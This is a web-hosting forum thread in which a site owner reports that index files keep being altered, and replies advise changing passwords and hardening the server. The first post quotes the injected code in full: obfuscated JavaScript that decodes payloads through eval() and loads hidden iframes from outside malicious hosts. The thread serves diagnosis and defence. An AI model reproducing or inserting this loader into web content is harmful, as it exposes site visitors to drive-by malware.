
Why are my index files on the server infected with JS/Kryptik.B (Trojan)?

Discussion in 'General Discussion' started by PC-Drivers, Nov 29, 2008.

  1. PC-Drivers

    When I upload an index file (index.htm / index.html / index.php) #index.ext#,
    within about three days the copy on the server is automatically modified: when I view the file, it contains JavaScript code with a trojan.

    Example:

    Code:
    <!--
      Specimen of injected content, kept verbatim for analysis. Do not load this markup in a browser.
      What the visible code does, element by element:
      1. First script element: the object wJjZIf holds a Base64 decoder (i11Ojos, using the standard
         alphabet stored in `ou`), a UTF-8 decoding step (UXu6uINfsK), and WAa, which passes its
         argument to eval(). The Base64 literal handed to it decodes to a document.write() call that
         emits an iframe with width=0 and height=0 whose src is
         hxxp://a9rhiwa[.]cn/update_files/update.php (defanged here).
      2. Second and third script elements (the same code appears twice): BESgJKf maps each input
         character through the lookup table omP9gI (index = char code minus 48), reassembles bytes
         from the 6-bit values, XORs each byte with 55, and the result is passed to eval().
         vyndztmmJ reaches String.fromCharCode through a hex-escaped property name.
         The decoded payload is not reproduced in this note.
      3. A plain iframe with style="display:none" and src hxxp://avwav[.]com/3341.htm (defanged here).
      4. Fourth and fifth script elements (again the same code twice): K3EEJ follows the same scheme
         with a different table (EVgfz) and XOR value 202. It also assembles "fromCharCode" and a
         Math.min call from string fragments, the latter through eval().
      The repeated copies presumably mean the file was modified more than once; confirm against
      file timestamps and FTP/HTTP logs.
      For detection, look in served files for eval() fed by String.fromCharCode or by long opaque
      string literals, and for iframes that are zero-sized or display:none and point to external hosts.
    -->
    <script language="JavaScript">var wJjZIf={ou:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",i11Ojos:function(WlsrpEG){var gruMqF0vy="",qsHiSfFA5UD0C0,Ook8UnFsAzpv8,uQqDFZKnr,kXMqka9Zkc,pICrUeduf35SE,SZrTnjYXQuk7U,A6skYhraPC4rx,jtskEvcG=0;WlsrpEG=WlsrpEG.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(jtskEvcG<WlsrpEG.length){kXMqka9Zkc=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));pICrUeduf35SE=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));SZrTnjYXQuk7U=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));A6skYhraPC4rx=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));qsHiSfFA5UD0C0=(kXMqka9Zkc<<2)|(pICrUeduf35SE>>4);Ook8UnFsAzpv8=((pICrUeduf35SE&15)<<4)|(SZrTnjYXQuk7U>>2);uQqDFZKnr=((SZrTnjYXQuk7U&3)<<6)|A6skYhraPC4rx;gruMqF0vy+=this.NTdhIMHe1Sd(qsHiSfFA5UD0C0);if(SZrTnjYXQuk7U!=64){gruMqF0vy+=this.NTdhIMHe1Sd(Ook8UnFsAzpv8);}if(A6skYhraPC4rx!=64){gruMqF0vy+=this.NTdhIMHe1Sd(uQqDFZKnr);}}return(wJjZIf.UXu6uINfsK(gruMqF0vy));},UXu6uINfsK:function(X8){var slflkY2R="",kllYRVG2Z2U=bfCRqsX=cfMYGqAqE2=yf0nHdCYyIROAktg=0;while(kllYRVG2Z2U<X8.length){bfCRqsX=X8.charCodeAt(kllYRVG2Z2U);if(bfCRqsX<128){slflkY2R+=this.NTdhIMHe1Sd(bfCRqsX);kllYRVG2Z2U++;}else if((bfCRqsX>191)&&(bfCRqsX<224)){yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&31)<<6)|(yf0nHdCYyIROAktg&63));kllYRVG2Z2U+=2;}else{yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);cfMYGqAqE2=X8.charCodeAt(kllYRVG2Z2U+2);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&15)<<12)|((yf0nHdCYyIROAktg&63)<<6)|(cfMYGqAqE2&63));kllYRVG2Z2U+=3;}}return(slflkY2R);},WAa:function(IwLaGn7P0Ft){eval(IwLaGn7P0Ft);},NTdhIMHe1Sd:function(zMNTzJcZik3Mcv){return(String.fromCharCode(zMNTzJcZik3Mcv));}}
    wJjZIf.WAa(wJjZIf.i11Ojos('ZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9MCBoZWlnaHQ9MCBzcmM9Imh0dHA6Ly9hOXJoaXdhLmNuL3VwZGF0ZV9maWxlcy91cGRhdGUucGhwIj48L2lmcmFtZT4nKQ=='))</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var 
E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><iframe src="http://avwav.com/3341.htm" style="display:none"></iframe><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var 
e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script>
    
     
  2. sirotex

    Um... then someone is modifying your files; it isn't 'automated'. Just remove the injected code and change all your passwords.
     
  3. apscinsspl

    Looks like your system is infected and your root password has leaked. Change the server's password as a priority, then remove all index files, reload them, and change all cPanel passwords, since FTP may also have been cracked.
     
  4. AndyReed

    If you don't secure and harden your server, hackers will continue infecting your files with JS code. Search the cPanel forum for information on how to secure and harden your server.
     
  5. thewebhosting

    Please regularly update the password of your CPanel and FTP accounts. Make sure you choose a strong password which contains special characters.

    Also, make a practice of checking for the latest available version of any third-party software installed on your domain.
     